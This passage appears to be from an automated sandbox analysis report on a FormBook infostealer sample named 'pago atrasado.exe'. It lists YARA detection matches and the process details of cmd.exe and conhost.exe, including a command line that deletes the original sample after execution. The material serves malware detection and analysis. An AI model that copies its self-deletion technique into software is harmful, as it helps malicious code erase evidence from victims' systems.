                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Analysis Process: cmd.exe PID: 4940 Parent PID: 248

                                          General

                                          Start time:16:43:38
                                          Start date:13/10/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x150000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 5060 Parent PID: 4940

                                          General

                                          Start time:16:43:38
                                          Start date:13/10/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >